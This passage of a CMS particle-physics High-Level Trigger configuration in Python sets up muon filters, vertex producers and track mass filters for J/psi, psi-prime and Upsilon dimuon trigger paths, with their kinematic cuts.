),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon10JpsiBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon11PsiPrime = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon11PsiPrimeL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 10.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 3.35 ),\n MaxInvMass = cms.double( 4.05 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon11PsiPrime = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuon11PsiPrimeL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon11PsiPrime = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon11PsiPrime\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon13JpsiBarrel = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltDimuon13BarrelJpsiL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltDimuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 12.9 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 1.25 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( True )\n)\nhltDisplacedmumuVtxProducerDimuon13JpsiBarrel = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( 
\"hltDimuon13BarrelJpsiL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterDimuon13JpsiBarrel = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerDimuon13JpsiBarrel\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltL1sL1TripleMu0 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_TripleMu0\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreDimuon0JpsiMuon = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltTripleMuonL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1TripleMu0\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 3 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( True ),\n SelectQualities = cms.vint32( 5, 6, 7 )\n)\nhltTripleMuonL2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 3 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltTripleMuL3PreFiltered0 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n MinN = cms.int32( 3 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 0.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( True )\n)\nhltJpsiMuonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n 
MinInvMass = cms.double( 2.8 ),\n MaxInvMass = cms.double( 3.35 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 999999.0 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerJpsiMuon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltJpsiMuonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterJpsiMuon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerJpsiMuon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreDimuon0UpsilonMuon = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltUpsilonMuonL3Filtered = cms.EDFilter( \"HLTMuonDimuonL3Filter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltTripleMuonL2PreFiltered0\" ),\n FastAccept = cms.bool( False ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n ChargeOpt = cms.int32( -1 ),\n MinPtPair = cms.double( 0.0 ),\n MinPtMax = cms.double( 0.0 ),\n MinPtMin = cms.double( 0.0 ),\n MinInvMass = cms.double( 8.5 ),\n MaxInvMass = cms.double( 11.5 ),\n MinAcop = cms.double( -999.0 ),\n MaxAcop = cms.double( 999.0 ),\n MinPtBalance = cms.double( -1.0 ),\n MaxPtBalance = cms.double( 999999.0 ),\n NSigmaPt = cms.double( 0.0 ),\n MaxDCAMuMu = cms.double( 0.5 ),\n MaxRapidityPair = cms.double( 2.5 ),\n saveTags = cms.bool( True ),\n CutCowboys = cms.bool( False )\n)\nhltDisplacedmumuVtxProducerUpsilonMuon = cms.EDProducer( \"HLTDisplacedmumuVtxProducer\",\n Src = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltUpsilonMuonL3Filtered\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinPtPair = cms.double( 0.0 ),\n MinInvMass = cms.double( 0.0 ),\n MaxInvMass = cms.double( 999999.0 ),\n ChargeOpt = cms.int32( -1 )\n)\nhltVertexmumuFilterUpsilonMuon = cms.EDFilter( \"HLTDisplacedmumuFilter\",\n FastAccept = cms.bool( True ),\n MinLxySignificance = cms.double( 0.0 ),\n MaxLxySignificance = cms.double( -1.0 ),\n MaxNormalisedChi2 = cms.double( 999999.0 ),\n MinVtxProbability = cms.double( 0.0050 ),\n MinCosinePointingAngle = cms.double( -2.0 ),\n saveTags = cms.bool( True ),\n DisplacedVertexTag = cms.InputTag( \"hltDisplacedmumuVtxProducerUpsilonMuon\" ),\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n MuonTag = cms.InputTag( \"hltL3MuonCandidates\" )\n)\nhltPreMu5L2Mu2Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu5L2Mu2L1Filtered0 = cms.EDFilter( 
\"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1DoubleMu0HighQ\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 2 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu5L2Mu2L2PreFiltered0 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 2 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 2.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu5L2Mu2L3Filtered5 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L2PreFiltered0\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 5.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMu5L2Mu2JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5L2Mu2L3Filtered5\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 2.0 ),\n MinTrackP = cms.double( 0.0 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 2 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 1.8 ),\n MaxMasses = cms.vdouble( 4.5 )\n)\nhltL1sL1SingleMu3 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_SingleMu3\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreMu5Track2Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu5TrackJpsiL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1SingleMu3\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 1 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu5TrackJpsiL2Filtered3 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = 
cms.InputTag( \"hltMu5TrackJpsiL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 4.5 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu5TrackJpsiL3Filtered3 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5TrackJpsiL2Filtered3\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 5.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMuTrackJpsiPixelTrackSelector = cms.EDProducer( \"QuarkoniaTrackSelector\",\n muonCandidates = cms.InputTag( \"hltL3MuonCandidates\" ),\n tracks = cms.InputTag( \"hltPixelTracks\" ),\n checkCharge = cms.bool( False ),\n MinTrackPt = cms.double( 0.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMuTrackJpsiPixelTrackCands = cms.EDProducer( \"ConcreteChargedCandidateProducer\",\n src = cms.InputTag( \"hltMuTrackJpsiPixelTrackSelector\" ),\n particleType = cms.string( \"mu-\" )\n)\nhltMu5Track1JpsiPixelMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiPixelTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5TrackJpsiL3Filtered3\" ),\n saveTags = cms.bool( False ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 1.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 3 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMuTrackJpsiTrackSeeds = cms.EDProducer( \"SeedGeneratorFromProtoTracksEDProducer\",\n InputCollection = cms.InputTag( \"hltMuTrackJpsiPixelTrackSelector\" ),\n InputVertexCollection = cms.InputTag( \"\" ),\n originHalfLength = cms.double( 1.0E9 ),\n originRadius = cms.double( 1.0E9 ),\n useProtoTrackKinematics = cms.bool( False ),\n useEventsWithNoVertex = cms.bool( True ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" )\n)\nhltMuTrackJpsiCkfTrackCandidates = cms.EDProducer( \"CkfTrackCandidateMaker\",\n src = cms.InputTag( \"hltMuTrackJpsiTrackSeeds\" ),\n TrajectoryBuilder = cms.string( \"hltESPMuTrackJpsiTrajectoryBuilder\" ),\n TrajectoryCleaner = cms.string( \"hltESPTrajectoryCleanerBySharedHits\" ),\n NavigationSchool = cms.string( \"SimpleNavigationSchool\" ),\n RedundantSeedCleaner = cms.string( \"CachingSeedCleanerBySharedInput\" ),\n useHitsSplitting = cms.bool( False ),\n doSeedingRegionRebuilding = cms.bool( False ),\n TransientInitialStateEstimatorParameters = cms.PSet( \n propagatorAlongTISE = cms.string( \"PropagatorWithMaterial\" ),\n numberMeasurementsForFit = cms.int32( 4 ),\n propagatorOppositeTISE = cms.string( \"PropagatorWithMaterialOpposite\" )\n ),\n cleanTrajectoryAfterInOut = cms.bool( False ),\n maxNSeeds = cms.uint32( 100000 
)\n)\nhltMuTrackJpsiCtfTracks = cms.EDProducer( \"TrackProducer\",\n TrajectoryInEvent = cms.bool( True ),\n useHitsSplitting = cms.bool( False ),\n clusterRemovalInfo = cms.InputTag( \"\" ),\n alias = cms.untracked.string( \"hltMuTrackJpsiCtfTracks\" ),\n Fitter = cms.string( \"hltESPFittingSmootherRK\" ),\n Propagator = cms.string( \"hltESPRungeKuttaTrackerPropagator\" ),\n src = cms.InputTag( \"hltMuTrackJpsiCkfTrackCandidates\" ),\n beamSpot = cms.InputTag( \"hltOnlineBeamSpot\" ),\n TTRHBuilder = cms.string( \"hltESPTTRHBWithTrackAngle\" ),\n AlgorithmName = cms.string( \"undefAlgorithm\" ),\n NavigationSchool = cms.string( \"\" )\n)\nhltMuTrackJpsiCtfTrackCands = cms.EDProducer( \"ConcreteChargedCandidateProducer\",\n src = cms.InputTag( \"hltMuTrackJpsiCtfTracks\" ),\n particleType = cms.string( \"mu-\" )\n)\nhltMu5Track2JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiCtfTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu5Track1JpsiPixelMassFiltered\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 2.0 ),\n MinTrackP = cms.double( 2.7 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 5 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 0.5 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.7 ),\n MaxMasses = cms.vdouble( 3.5 )\n)\nhltL1sL1SingleMu7 = cms.EDFilter( \"HLTLevel1GTSeed\",\n L1UseL1TriggerObjectMaps = cms.bool( True ),\n L1NrBxInEvent = cms.int32( 3 ),\n L1TechTriggerSeeding = cms.bool( False ),\n L1UseAliasesForSeeding = cms.bool( True ),\n L1SeedsLogicalExpression = cms.string( \"L1_SingleMu7\" ),\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n L1GtObjectMapTag = cms.InputTag( \"hltL1GtObjectMap\" ),\n L1CollectionsTag = cms.InputTag( \"hltL1extraParticles\" ),\n L1MuonCollectionTag = cms.InputTag( \"hltL1extraParticles\" ),\n saveTags = cms.bool( True )\n)\nhltPreMu7Track7Jpsi = cms.EDFilter( \"HLTPrescaler\",\n L1GtReadoutRecordTag = cms.InputTag( \"hltGtDigis\" ),\n offset = cms.uint32( 0 )\n)\nhltMu7TrackJpsiL1Filtered0 = cms.EDFilter( \"HLTMuonL1Filter\",\n CandTag = cms.InputTag( \"hltL1extraParticles\" ),\n PreviousCandTag = cms.InputTag( \"hltL1sL1SingleMu7\" ),\n MaxEta = cms.double( 2.5 ),\n MinPt = cms.double( 0.0 ),\n MinN = cms.int32( 1 ),\n ExcludeSingleSegmentCSC = cms.bool( False ),\n CSCTFtag = cms.InputTag( \"unused\" ),\n saveTags = cms.bool( False ),\n SelectQualities = cms.vint32( )\n)\nhltMu7TrackJpsiL2Filtered3 = cms.EDFilter( \"HLTMuonL2PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL2MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7TrackJpsiL1Filtered0\" ),\n SeedMapTag = cms.InputTag( \"hltL2Muons\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MaxDr = cms.double( 9999.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 6.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False ),\n AbsEtaBins = cms.vdouble( 5.0 ),\n MinNstations = cms.vint32( 0 ),\n MinNhits = cms.vint32( 0 )\n)\nhltMu7TrackJpsiL3Filtered3 = cms.EDFilter( \"HLTMuonL3PreFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n PreviousCandTag = cms.InputTag( 
\"hltMu7TrackJpsiL2Filtered3\" ),\n MinN = cms.int32( 1 ),\n MaxEta = cms.double( 2.5 ),\n MinNhits = cms.int32( 0 ),\n MaxDr = cms.double( 2.0 ),\n MaxDz = cms.double( 9999.0 ),\n MinPt = cms.double( 7.0 ),\n NSigmaPt = cms.double( 0.0 ),\n saveTags = cms.bool( False )\n)\nhltMu7Track6JpsiPixelMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiPixelTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7TrackJpsiL3Filtered3\" ),\n saveTags = cms.bool( False ),\n checkCharge = cms.bool( False ),\n MinTrackPt = cms.double( 6.0 ),\n MinTrackP = cms.double( 2.5 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 3 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 99999.9 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.0 ),\n MaxMasses = cms.vdouble( 4.6 )\n)\nhltMu7Track7JpsiTrackMassFiltered = cms.EDFilter( \"HLTMuonTrackMassFilter\",\n BeamSpotTag = cms.InputTag( \"hltOnlineBeamSpot\" ),\n CandTag = cms.InputTag( \"hltL3MuonCandidates\" ),\n TrackTag = cms.InputTag( \"hltMuTrackJpsiCtfTrackCands\" ),\n PreviousCandTag = cms.InputTag( \"hltMu7Track6JpsiPixelMassFiltered\" ),\n saveTags = cms.bool( True ),\n checkCharge = cms.bool( True ),\n MinTrackPt = cms.double( 7.0 ),\n MinTrackP = cms.double( 2.7 ),\n MaxTrackEta = cms.double( 999.0 ),\n MaxTrackDxy = cms.double( 999.0 ),\n MaxTrackDz = cms.double( 999.0 ),\n MinTrackHits = cms.int32( 5 ),\n MaxTrackNormChi2 = cms.double( 1.0E10 ),\n MaxDCAMuonTrack = cms.double( 0.5 ),\n CutCowboys = cms.bool( False ),\n MinMasses = cms.vdouble( 2.7 ),\n MaxMasses = cms.vdouble( 3.5 )\n)\nhltFEDSelector = cms.EDProducer( \"EvFFEDSelector\",\n inputTag = cms.InputTag( \"rawDataCollector\" ),\n fedList = cms.vuint32( 1023 )\n)\nhltTriggerSummaryAOD = cms.EDProducer( \"TriggerSummaryProducerAOD\",\n processName = cms.string( \"@\" )\n)\nhltTriggerSummaryRAW = cms.EDProducer( \"TriggerSummaryProducerRAW\",\n processName = cms.string( \"@\" )\n)\n\nHLTL1UnpackerSequence = cms.Sequence( hltGtDigis + hltGctDigis + hltL1GtObjectMap + hltL1extraParticles )\nHLTBeamSpot = cms.Sequence( hltScalersRawToDigi + hltOnlineBeamSpot + hltOfflineBeamSpot )\nHLTBeginSequence = cms.Sequence( hltTriggerType + HLTL1UnpackerSequence + HLTBeamSpot )\nHLTMuonLocalRecoSequence = cms.Sequence( hltMuonDTDigis + hltDt1DRecHits + hltDt4DSegments + hltMuonCSCDigis + hltCsc2DRecHits + hltCscSegments + hltMuonRPCDigis + hltRpcRecHits )\nHLTL2muonrecoNocandSequence = 